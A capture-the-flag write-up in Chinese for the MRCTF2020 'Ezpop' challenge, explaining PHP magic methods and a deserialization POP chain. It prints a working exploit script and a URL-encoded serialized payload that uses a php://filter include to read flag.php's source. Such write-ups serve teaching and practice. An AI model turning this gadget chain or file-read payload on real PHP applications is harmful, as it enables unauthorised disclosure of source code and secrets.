[MRCTF2020]Ezpop
就像题目说的,又是一道反序列化的 pop 链的题,直接给了源码
几个小知识
1、
__get()
是访问不存在的成员变量时调用的。
2、__set()
是设置不存在的成员变量时调用的。
举个例子
<?php
class Test{
public $c=0;
public $arr=array();
public function __set($x,$y){
echo $x . "\n";
echo $y . "\n";
$this->arr[$x]=$y;
}
public function __get($x){
echo "The value of $x is".$this->arr[$x];
}
}
$a = new Test;
$a->b = 1 ;//成员变量b不存在,所以会调用__set
$a->c = 2;//成员变量c存在,所以无任何输出
$d=$a->b;// 成员变量b不存在,所以会调用__get
?>
3、
__wakeup
使用反序列化函数时触发
4、__toString
当一个对象被当作字符串对待的时候,会触发这个魔术方法。
5、__invoke
当脚本尝试将对象调用为函数时触发。
解题思路
整体看一遍,危险函数include,我们可以利用var变量
为php伪协议就可以读取到flag.php
源码。需要利用就要调用 __invoke 函数。
而需要调用它只有Test类可以做到。且需要触发__get且把$p 赋值为Modifier类
。
要触发__get类,我们看到show类中的__toString
可以触发,且此时str等于Test类,Test类不存在source变量
。
要触发__toString类,有2个方法。第一我们调用__construct函数且传参一个Show类,第二我们直接利用__wakeup且直接把str赋值为Show类。
payload
<?php
class Modifier {
protected $var='php://filter/convert.base64-encode/resource=flag.php';
}
class Show{
public $source;
public $str;
public function __construct($file){
$this->source = $file;
}
}
class Test{
public $p ;
public function __construct(){
$this->p = new Modifier();
}
}
$o = new Show();
$o->str= new Test();
$a= new Show($o);
echo serialize($a);
//O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"*var";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}}s:3:"str";N;}
得到的序列化URL编码一下
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
最后base64解码就是flag了